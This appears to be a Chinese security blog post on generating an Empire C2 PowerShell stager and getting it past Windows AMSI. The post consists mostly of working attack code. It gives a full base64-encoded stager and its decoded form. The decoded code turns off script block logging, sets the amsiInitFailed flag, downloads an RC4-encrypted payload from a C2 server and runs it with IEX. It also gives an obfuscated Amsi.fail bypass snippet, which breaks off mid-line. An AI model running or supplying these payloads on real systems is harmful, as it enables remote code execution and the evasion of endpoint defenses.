构建自定义的Empire模块来绕过amsi

鸿鹄实验室

发布于 2021-04-29 17:12:04

7510

发布于 2021-04-29 17:12:04

文章被收录于专栏：鸿鹄实验室

今天逛推特，看到了某师傅通过自定义Empire模块来绕过amsi，地址如下：https://twitter.com/_vinnybod/status/1386442836417994752

但可惜的是，作者没有给出任何的细节，于是本人便自行尝试了一把，并记录下来操作过程。但是Empire的最新版本是3.8.2,所以我们的测试环境也就是github的最新版本，下载地址如下：

https://github.com/BC-SECURITY/Empire/releases/tag/v3.8.2

安装过程这边就先略过了，本身Empire也提供了安装脚本，傻瓜式安装即可。我们以基本的http监听其为例

可以看到其给出的相关选项，包括新加入的抖动值和profile选项。执行并生成powershell载荷

powershell -noP -sta -w 1 -enc  SQBGACgAJABQAFMAVgBFAFIAcwBpAE8ATgBU
AGEAQgBsAGUALgBQAFMAVgBFAHIAUwBpAG8ATgAuAE0AYQBqAE8AUgAgAC0ARwBlACAA
MwApAHsAJABCAEUAMgBlADMAPQBbAFIAZQBmAF0ALgBBAFMAcwBFAG0AQgBMAHkALgBH
AGUAVABUAFkAcABFACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQA
LgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AVQB0AGkAbABzACcAKQAuACIARwBlAFQARgBp
AGUAYABsAGQAIgAoACcAYwBhAGMAaABlAGQARwByAG8AdQBwAFAAbwBsAGkAYwB5AFM
AZQB0AHQAaQBuAGcAcwAnACwAJwBOACcAKwAnAG8AbgBQAHUAYgBsAGkAYwAsAFMAdAB
hAHQAaQBjACcAKQA7AEkARgAoACQAYgBFADIARQAzACkAewAkADgAZgBBADEAQgA9ACQ
AQgBFADIAZQAzAC4ARwBFAFQAVgBBAEwAVQBFACgAJABuAFUAbABMACkAOwBJAGYAKA
AkADgAZgBBADEAYgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnA
GcAaQBuAGcAJwBdACkAewAkADgARgBBADEAYgBbACcAUwBjAHIAaQBwAHQAQgAnACsA
JwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcg
BpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA
4AGYAYQAxAGIAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBn
AGkAbgBnACcAXQBbACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnAF0APQAwAH0AJABWAGEAbAA9AFsAQwBvAEwAbABFAGMAdABpAE8ATgBzAC4ARwBlAE4ARQByAGkAYwAuAEQASQBjAHQASQBvAG4AQQBSAFkAWwBzAFQAUgBJAE4AZwAsAFMAeQBTAHQARQBtAC4ATwBiAEoAZQBjAHQAXQBdADoAOgBuAGUAVwAoACkAOwAkAFYAQQBMAC4AQQBEAGQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcALAAwACkAOwAkAFYAQQBMAC4AQQBkAGQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAbABvAGMAawBJAG4AdgBvAGMAYQB0AGkAbwBuAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAOABmAGEAMQBCAFsAJwBIAEsARQBZAF8ATABPAEMAQQBMAF8ATQBBAEMASABJAE4ARQBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFAAbwB3AGUAcgBTAGgAZQBsAGwAXABTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAkAFYAYQBMAH0ARQBsAFMAZQB7AFsAUwBjAFIAaQBwAHQAQgBMAE8AYwBrAF0ALgAiAEcAZQBUAEYAaQBFAGAATABkACIAKAAnAHMAaQBnAG4AYQB0AHUAcgBlAHMAJwAsACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdABWAEEAbABVAGUAKAAkAE4AVQBsAEwALAAoAE4ARQB3AC0ATwBCAEoAZQBDAFQAIABDAG8AbABsAEUAYwB0AGkAbwBuAHMALgBHAEUATgBlAFIAaQBjAC4ASABhAHMASABTAEUAVABbAFMAVABSAGkATgBnAF0AKQApAH0AJABSAGUARgA9AFsAUgBlAEYAXQAuAEEAUwBTAGUATQBCAGwAWQAuAEcARQBUAFQAWQBwAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpACcAKwAnAFUAdABpAGwAcwAnACkAOwAkAFIAZQBGAC4ARwBlAHQARgBpAGUATABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgAnACsAJwBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAdABWAEEATABVAEUAKAAkAG4AVQBsAEwALAAkAFQAcgBVAGUAKQA7AH0AOwBbAFMAeQBTAFQAZQBtAC4ATgBFAFQALgBTAGUAUgBWAGkAYwBFAFAATwBpAG4AVABNAEEATgBhAEcARQBSAF0AOgA6AEUAeABQAGUAQwB0ADEAMAAwAEMAbwBuAFQASQBuAFUAZQA9ADAAOwAkAEUANgBDAEMANQA9AE4AZQBXAC0ATwBCAEoAZQBjAHQAIABTAHkAUwBUAEUATQAuAE4ARQBUAC4AVwBlAEIAQwBMAEkAZQBOAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABzAGUAcgA9ACQAKABbAFQARQB4AFQALgBFAE4AYwBvAEQASQBuAGcAXQA6ADoAVQBuAGkAQwBPAGQAZQAuAEcARQBUAFMAVABSAEkAbgBHACgAWwBDAE8AbgB2AGUAcgBUAF0AOgA6AEYAUgBvAG0AQgBhAHMAZQA2ADQAUwB0AFIASQBuAGcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBOAGcAQQA0AEEAQwA0AEEATQBnAEEAdQBBAEQARQBBAE0AUQBBADAAQQBEAG8AQQBOAEEAQQAwAEEARABRAEEATgBBAEEAPQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJABFADYAQwBjADUALgBIAEUAYQBkAGUAUgBTAC4AQQBkAEQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJABFADYAYwBjADUALgBQAHIATwB4AFkAPQBbAFMAeQBTAFQARQBNAC4ATgBlAFQALgBXAEUAYgBSAGUAcQBVAGUAUwBUAF0AOgA6AEQAZQBGAEEAdQBMAHQAVwBFAGIAUABSAG8AeAB5ADsAJABFADYAQwBjADUALgBQAHIATwBYAHkALgBDAFIAZQBEAEUAbgB0AEkAQQBMAHMAIAA9ACAAWwBTAFkAUwBUAGUATQAuAE4AZQBUAC4AQwBSAEUAZABlAG4AdABpAGEATABDAEEAQwBIAEUAXQA6ADoARABlAGYAQQBVAEwAdABOAEUAVABXAG8AUgBrAEMAUgBFAGQAZQBOAHQASQBhAGwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJABlADYAYwBjADUALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAWQBTAFQARQBNAC4AVABFAFgAdAAuAEUATgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAFkAdABFAHMAKAAnADIAPwBVADQAUABaAF4AQwBLAHAAKABbAC0APgBRACoAKwBkAC8AQgBTAGMALABUAEcAMwBOAHcASABFAHkAawAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQBSAGcAUwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwB1AG4AVABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBCAFgAbwBSACQAUwBbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYAXQB9AH0AOwAkAGUANgBjAGMANQAuAEgARQBBAEQAZQByAHMALgBBAGQARAAoACIAQwBvAG8AawBpAGUAIgAsACIAdgBGAHMAUgBUAHgAYwBIAG0AcwA9AEQARgB2AFEASABHAHEAYwBHAGcARQBYAEUAdgBHADQAYwBHAEUANABWAHAAUgBaAGsATwA0AD0AIgApADsAJABEAEEAVABBAD0AJABFADYAYwBDADUALgBEAG8AdwBuAEwATwBBAEQARABBAHQAQQAoACQAcwBFAFIAKwAkAFQAKQA7ACQAaQBWAD0AJABkAEEAdABBAFsAMAAuAC4AMwBdADsAJABEAEEAdABhAD0AJABEAGEAVABBAFsANAAuAC4AJABEAEEAVABBAC4AbABlAG4ARwB0AEgAXQA7AC0ASgBPAEkAbgBbAEMASABhAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAVABhACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=

base64解码后如下：

('cachedGroupPolicySettings','N'+'onPublic,Static');IF($bE2E3){$8fA1
B=$BE2e3.GETVALUE($nUlL);If($8fA1b['ScriptB'+'lockLogging']){$8FA1b[
'ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$8fa1b['Sc
riptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$Val=[
CoLlEctiONs.GeNEric.DIctIonARY[sTRINg,SyStEm.ObJect]]::neW();$VAL.AD
d('EnableScriptB'+'lockLogging',0);$VAL.Add('EnableScriptBlockInvoca
tionLogging',0);$8fa1B['HKEY_LOCAL_MACHINE\Software\Policies\Micros
oft\Windows\PowerShell\ScriptB'+'lockLogging']=$VaL}ElSe{[ScRiptBLOc
k]."GeTFiE`Ld"('signatures','N'+'onPublic,Static').SetVAlUe($NUlL,(N
Ew-OBJeCT CollEctions.GENeRic.HasHSET[STRiNg]))}$ReF=[ReF].ASSeMBlY.GETTYpE('System.Management.Automation.Amsi'+'Utils');$ReF.GetFieLd('amsiInitF'+'ailed','NonPublic,Static').SEtVALUE($nUlL,$TrUe);};[SySTem.NET.SeRVicEPOinTMANaGER]::ExPeCt100ConTInUe=0;$E6CC5=NeW-OBJect SySTEM.NET.WeBCLIeNT;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$ser=$([TExT.ENcoDIng]::UniCOde.GETSTRInG([COnverT]::FRomBase64StRIng('aAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMgAuADEAMQA0ADoANAA0ADQANAA=')));$t='/news.php';$E6Cc5.HEadeRS.AdD('User-Agent',$u);$E6cc5.PrOxY=[SySTEM.NeT.WEbReqUeST]::DeFAuLtWEbPRoxy;$E6Cc5.PrOXy.CReDEntIALs = [SYSTeM.NeT.CREdentiaLCACHE]::DefAULtNETWoRkCREdeNtIals;$Script:Proxy = $e6cc5.Proxy;$K=[SYSTEM.TEXt.ENcoding]::ASCII.GetBYtEs('2?U4PZ^CKp([->Q*+d/BSc,TG3NwHEyk');$R={$D,$K=$ARgS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CounT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-BXoR$S[($S[$I]+$S[$H])%256]}};$e6cc5.HEADers.AdD("Cookie","vFsRTxcHms=DFvQHGqcGgEXEvG4cGE4VpRZkO4=");$DATA=$E6cC5.DownLOADDAtA($sER+$T);$iV=$dAtA[0..3];$DAta=$DaTA[4..$DATA.lenGtH];-JOIn[CHar[]](& $R $daTa ($IV+$K))|IEX

我们没必要去关心这些代码具体去做了什么，我们只需要知道，这个代码是会被拦截的就够了。

最简单来说我们可以使用Amsi.fail来生成我们的载荷

比如下面这样

[Ref].AsSEMbly.GeTtype('System.Management.Automation.'+
$([SYsTeM.NET.weButIlity]::HTmLDEcodE('&#65;&#109;&#115;&#105;'))+
'Utils').GetField(''+$([CHAr]([BYTe]0x61)+[chAR](81+28)+
[char](211-96)+[cHaR](149-44))+'InitFailed',$([CHaR]
([byTe]0x4E)+[ChAr](198-87)+[CHaR](1980/18)+[CHAR](77+3)+
[ChAr]([Byte]0x75)+[CHar](5684/58)+[cHAR]([BYte]0x6C)+[ChAR]
([BYtE]0x69)+[ChaR]([BYTE]0x63)+[chAR]([bYtE]0x2C)+[ChAR]
([Byte]0x53)+[cHAR](116)+[ChAR](97)+[chaR]([BytE]0x74)+
[Char](68+37)+[cHAr](78+21))).Set

这样再执行，就不会被拦截了：